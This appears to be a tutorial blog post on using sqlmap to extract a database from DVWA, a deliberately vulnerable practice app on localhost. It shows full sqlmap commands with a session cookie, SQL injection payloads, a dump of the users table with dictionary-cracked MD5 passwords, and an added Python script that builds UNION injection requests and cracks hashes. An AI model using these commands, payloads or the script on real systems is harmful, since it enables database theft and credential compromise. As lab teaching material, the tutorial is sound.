Extract Database With Sqlmap

Bismillah...

Hello, buddy! Have you ever wondered why Oracle Corp would monopolize and commercialize MySQL while so many people already depend on it in their development? You don't need to answer that, seriously; we aren't going to talk about it here. Instead we're going to talk about how to use sqlmap to extract a database.

Assumptions:
  • You have apache2, mysql and phpmyadmin installed on your system.
  • I use DVWA as the victim site; click here for more information and the download link.
  • You have already found the vulnerable parameter on the DVWA site. Click here for the tutorial.
  • I use Mantra and Burp Suite for IG (Information Gathering). Click here for the tutorial! This matters because it is how you find the cookie.
Open your terminal and go to the sqlmap directory, "cd /pentest/database/sqlmap/", or use the gnome menu.
So let's rock, here's the step:

  1. First read the manual by typing "./sqlmap.py -h".
  2. Once you know the basic usage, let's continue. Here is the syntax: "./sqlmap.py -u victim_url --cookie=Cookie --dbs". If the target only serves the vulnerable page to a logged-in user, as DVWA does, you have to supply the session cookie, which you can capture with Burp Suite. If there is no login, point sqlmap at the vulnerable URL directly: "./sqlmap.py -u victim_url --dbs". Note the pieces of the syntax: "-u" takes the URL (quote it, because the "&" in the query string would otherwise be interpreted by the shell), "--cookie" sends the captured cookie with every request, and "--dbs" enumerates the database names. In DVWA the "security=low" cookie selects the unfiltered version of the page, so keep it alongside the PHPSESSID. In my case the command looks like this:
    ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=bij3f95ead4t1ueh7t0qijoh02" --dbs
  3. Output:


        sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
        http://sqlmap.org

    [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

    [*] starting at 17:17:09

    [17:17:10] [INFO] resuming back-end DBMS 'mysql' 
    [17:17:10] [INFO] testing connection to the target url
    sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
    ---
    Place: GET
    Parameter: id
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: id=1' AND 7478=7478 AND 'UEwS'='UEwS&Submit=Submit

        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
        Payload: id=1' AND (SELECT 9832 FROM(SELECT COUNT(*),CONCAT(0x3a7977783a,(SELECT (CASE WHEN (9832=9832) THEN 1 ELSE 0 END)),0x3a736b733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'fXTy'='fXTy&Submit=Submit

        Type: UNION query
        Title: MySQL UNION query (NULL) - 2 columns
        Payload: id=1' LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a7977783a,0x737653766b4c48705746,0x3a736b733a)#&Submit=Submit

        Type: AND/OR time-based blind
        Title: MySQL > 5.0.11 AND time-based blind
        Payload: id=1' AND SLEEP(5) AND 'tdry'='tdry&Submit=Submit
    ---

    [17:17:10] [INFO] the back-end DBMS is MySQL
    web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
    web application technology: PHP 5.3.2, Apache 2.2.14
    back-end DBMS: MySQL 5.0
    [17:17:10] [INFO] fetching database names
    [17:17:10] [WARNING] reflective value(s) found and filtering out
    available databases [6]:
    cacti
    [*] dvwa
    [*] information_schema
    [*] mysql
    [*] nowasp
    [*] owasp10

    [17:17:10] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'
    [*] shutting down at 17:17:10
    Two things in this output are worth noticing. "resuming back-end DBMS 'mysql'" and "a total of 0 HTTP(s) requests" mean sqlmap had already tested this URL in an earlier run and reused the injection points from its session file under output/localhost instead of testing again. "reflective value(s) found and filtering out" means the page echoes the injected id parameter back, so sqlmap filters those echoes out before reading results. Can you see the databases? Now guess which one is relevant. Yes, you are right, dvwa is the one we are looking for :D
  4. We have the database name, "dvwa"; the next step is to get the table names, which "-D dvwa --tables" does.
  5. ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=bij3f95ead4t1ueh7t0qijoh02" -D dvwa --tables
    Output:

    sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
        http://sqlmap.org

    [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

    [*] starting at 17:37:07

    [17:37:07] [INFO] resuming back-end DBMS 'mysql'
    [17:37:07] [INFO] testing connection to the target url
    sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
    ---
    Place: GET
    Parameter: id
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: id=1' AND 7478=7478 AND 'UEwS'='UEwS&Submit=Submit

        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
        Payload: id=1' AND (SELECT 9832 FROM(SELECT COUNT(*),CONCAT(0x3a7977783a,(SELECT (CASE WHEN (9832=9832) THEN 1 ELSE 0 END)),0x3a736b733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'fXTy'='fXTy&Submit=Submit

        Type: UNION query
        Title: MySQL UNION query (NULL) - 2 columns
        Payload: id=1' LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a7977783a,0x737653766b4c48705746,0x3a736b733a)#&Submit=Submit

        Type: AND/OR time-based blind
        Title: MySQL > 5.0.11 AND time-based blind
        Payload: id=1' AND SLEEP(5) AND 'tdry'='tdry&Submit=Submit
    ---

    [17:37:08] [INFO] the back-end DBMS is MySQL
    web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
    web application technology: PHP 5.3.2, Apache 2.2.14
    back-end DBMS: MySQL 5.0
    [17:37:08] [INFO] fetching tables for database: 'dvwa'
    [17:37:08] [WARNING] reflective value(s) found and filtering out
    Database: dvwa
    [2 tables]
    +-----------+
    | guestbook |
    | users     |
    +-----------+

    [17:37:08] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

    [*] shutting down at 17:37:08
    There are the table names. All that is left is to dump the users table.
  6. Don't celebrate yet, there is still work to do.
  7. ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=low; PHPSESSID=bij3f95ead4t1ueh7t0qijoh02" -T users --dump
    This command omits "-D". As the warning in the output below shows, sqlmap then falls back to the current database, which happens to be dvwa here; on a server with several databases pass "-D dvwa -T users --dump" so it dumps the table you mean.
    Output:


       sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
        http://sqlmap.org

    [!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

    [*] starting at 17:38:00

    [17:38:01] [INFO] resuming back-end DBMS 'mysql'
    [17:38:01] [INFO] testing connection to the target url
    sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
    ---
    Place: GET
    Parameter: id
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause
        Payload: id=1' AND 7478=7478 AND 'UEwS'='UEwS&Submit=Submit

        Type: error-based
        Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
        Payload: id=1' AND (SELECT 9832 FROM(SELECT COUNT(*),CONCAT(0x3a7977783a,(SELECT (CASE WHEN (9832=9832) THEN 1 ELSE 0 END)),0x3a736b733a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'fXTy'='fXTy&Submit=Submit

        Type: UNION query
        Title: MySQL UNION query (NULL) - 2 columns
        Payload: id=1' LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a7977783a,0x737653766b4c48705746,0x3a736b733a)#&Submit=Submit

        Type: AND/OR time-based blind
        Title: MySQL > 5.0.11 AND time-based blind
        Payload: id=1' AND SLEEP(5) AND 'tdry'='tdry&Submit=Submit
    ---

    [17:38:01] [INFO] the back-end DBMS is MySQL
    web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
    web application technology: PHP 5.3.2, Apache 2.2.14
    back-end DBMS: MySQL 5.0
    [17:38:01] [WARNING] missing database parameter, sqlmap is going to use the current database to enumerate table(s) entries
    [17:38:01] [INFO] fetching current database
    [17:38:01] [WARNING] reflective value(s) found and filtering out
    [17:38:02] [INFO] fetching columns for table 'users' in database 'dvwa'
    [17:38:02] [INFO] fetching entries for table 'users' in database 'dvwa'
    [17:38:02] [INFO] analyzing table dump for possible password hashes
    recognized possible password hashes in column 'password'. Do you want to crack them via a dictionary-based attack? [Y/n/q] Y

    [17:38:19] [INFO] using hash method 'md5_generic_passwd'
    what dictionary do you want to use?
    [1] default dictionary file '/pentest/database/sqlmap/txt/wordlist.txt' (press Enter)
    [2] custom dictionary file
    [3] file with list of dictionary files
    > 1

    [17:39:26] [INFO] using default dictionary
    [17:39:26] [INFO] loading dictionary from '/pentest/database/sqlmap/txt/wordlist.txt'
    do you want to use common password suffixes? (slow!) [y/N] y

    [17:39:29] [INFO] starting dictionary-based cracking (md5_generic_passwd)
    [17:39:29] [INFO] starting 4 processes
    [17:39:35] [INFO] cracked password 'abc123' for user 'gordonb'              
    [17:39:37] [INFO] cracked password 'charley' for user '1337'                
    [17:39:42] [INFO] cracked password 'letmein' for user 'pablo'                
    [17:39:45] [INFO] cracked password 'password' for user 'admin'              
    [17:39:50] [INFO] postprocessing table dump                                  
    Database: dvwa
    Table: users
    [5 entries]
    +---------+---------+--------------------------------------------------+---------------------------------------------+-----------+------------+
    | user_id | user    | avatar                                           | password                                    | last_name | first_name |
    +---------+---------+--------------------------------------------------+---------------------------------------------+-----------+------------+
    | 1       | admin   | http://localhost/dvwa/hackable/users/admin.jpg   | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | admin     | admin      |
    | 2       | gordonb | http://localhost/dvwa/hackable/users/gordonb.jpg | e99a18c428cb38d5f260853678922e03 (abc123)   | Brown     | Gordon     |
    | 3       | 1337    | http://localhost/dvwa/hackable/users/1337.jpg    | 8d3533d75ae2c3966d7e0d4fcc69216b (charley)  | Me        | Hack       |
    | 4       | pablo   | http://localhost/dvwa/hackable/users/pablo.jpg   | 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein)  | Picasso   | Pablo      |
    | 5       | smithy  | http://localhost/dvwa/hackable/users/smithy.jpg  | 5f4dcc3b5aa765d61d8327deb882cf99 (password) | Smith     | Bob        |
    +---------+---------+--------------------------------------------------+---------------------------------------------+-----------+------------+

    [17:39:50] [INFO] table 'dvwa.users' dumped to CSV file '/pentest/database/sqlmap/output/localhost/dump/dvwa/users.csv'
    [17:39:50] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/localhost'

    [*] shutting down at 17:39:50
    Voilà... the usernames and passwords appear. The password column holds unsalted MD5 hashes, not encrypted values, and sqlmap has already run them through its default wordlist: the cracked plaintext is shown in parentheses next to each hash, and all five entries are resolved (admin and smithy share the hash of "password"). The same data is written to the CSV file under output/localhost/dump/dvwa/. Any hash that stayed uncracked would be your last job to solve :P
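To make the sqlmap output above less of a black box, here is a small Python script that does by hand what the "MySQL UNION query (NULL) - 2 columns" step and the "md5_generic_passwd" step do. It is an added example for this post, not sqlmap's code and not part of the original tutorial. It reuses the DVWA URL, cookie and marker literals from the log (0x3a7977783a and 0x3a736b733a decode to ":ywx:" and ":sks:"), but the page body it parses, the fetch callback used to avoid a live request, and the tiny wordlist are all constructed here for illustration; run it against a real DVWA instance by leaving fetch=None.

```python
import hashlib
import re
import urllib.parse
import urllib.request

# Marker literals sqlmap wrapped around its UNION test value in the log above.
# They are MySQL hex literals so the payload needs no quote characters.
PREFIX_HEX = "0x3a7977783a"
SUFFIX_HEX = "0x3a736b733a"


def hex_literal_to_str(literal):
    """Decode a MySQL 0x... literal into text (0x3a7977783a -> ':ywx:')."""
    return bytes.fromhex(literal[2:]).decode("latin-1")


PREFIX = hex_literal_to_str(PREFIX_HEX)   # ':ywx:'
SUFFIX = hex_literal_to_str(SUFFIX_HEX)   # ':sks:'


def union_payload(expr, columns=2, payload_column=1):
    """Build DVWA's id value in the same shape as the UNION payload in the log,
    with our own SQL expression in place of sqlmap's random test string.
    LIMIT 1,1 drops the legitimate row so the page renders only the UNION row;
    the trailing # comments out the closing quote of the original query."""
    cols = ["NULL"] * columns
    cols[payload_column] = f"CONCAT({PREFIX_HEX},{expr},{SUFFIX_HEX})"
    return "1' LIMIT 1,1 UNION ALL SELECT " + ", ".join(cols) + "#"


def extract_marked(body):
    """Return every value found between the markers in a page body. The URL
    reflected by DVWA contains the raw hex, not the decoded markers, so the
    reflection (what sqlmap calls a reflective value) does not match."""
    return re.findall(re.escape(PREFIX) + "(.*?)" + re.escape(SUFFIX), body, re.S)


def parse_user_hashes(value):
    """Split a GROUP_CONCAT(user,0x3a,password) result into {user: md5_hex}."""
    out = {}
    for item in value.split(","):
        user, _, pw_hash = item.partition(":")
        out[user] = pw_hash
    return out


def crack_md5(hashes, wordlist):
    """Dictionary attack on unsalted MD5, the idea behind sqlmap's
    md5_generic_passwd step: hash each candidate once, then look hashes up."""
    table = {hashlib.md5(w.encode()).hexdigest(): w for w in wordlist}
    return {user: table[h] for user, h in hashes.items() if h in table}


def dvwa_union_query(base_url, cookie, expr, fetch=None):
    """Send one UNION request to DVWA with the session cookie and return the
    marked values. `fetch` is a hypothetical hook taking the URL and returning
    the body, used here so the example runs without a server."""
    params = {"id": union_payload(expr), "Submit": "Submit"}
    url = base_url + "?" + urllib.parse.urlencode(params)
    if fetch is None:
        req = urllib.request.Request(url, headers={"Cookie": cookie})
        with urllib.request.urlopen(req) as resp:
            body = resp.read().decode("utf-8", "replace")
    else:
        body = fetch(url)
    return extract_marked(body)


# Constructed stand-in for DVWA's response at security=low: the page echoes the
# id parameter (the reflective value), then renders the two UNION columns, the
# second of which carries our marked GROUP_CONCAT of users and hashes.
SAMPLE_BODY = (
    "<pre>ID: 1' LIMIT 1,1 UNION ALL SELECT NULL, CONCAT(0x3a7977783a,"
    "GROUP_CONCAT(user,0x3a,password),0x3a736b733a)#<br>"
    "First name: <br>"
    "Surname: :ywx:admin:5f4dcc3b5aa765d61d8327deb882cf99,"
    "gordonb:e99a18c428cb38d5f260853678922e03,"
    "smithy:5f4dcc3b5aa765d61d8327deb882cf99:sks:</pre>"
)


def demo():
    """Extract user:hash pairs from the constructed body and crack them."""
    values = dvwa_union_query(
        "http://localhost/dvwa/vulnerabilities/sqli/",
        "security=low; PHPSESSID=bij3f95ead4t1ueh7t0qijoh02",
        "GROUP_CONCAT(user,0x3a,password)",
        fetch=lambda url: SAMPLE_BODY,
    )
    hashes = parse_user_hashes(values[0])
    # Constructed mini wordlist; sqlmap used txt/wordlist.txt.
    return crack_md5(hashes, ["123456", "password", "abc123", "letmein"])


if __name__ == "__main__":
    print(demo())
```

Two details carry over from the log: the markers are what let sqlmap pick its result out of arbitrary HTML, and the hashes crack instantly because DVWA stores plain MD5 with no salt, so one wordlist pass covers every user with the same password.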
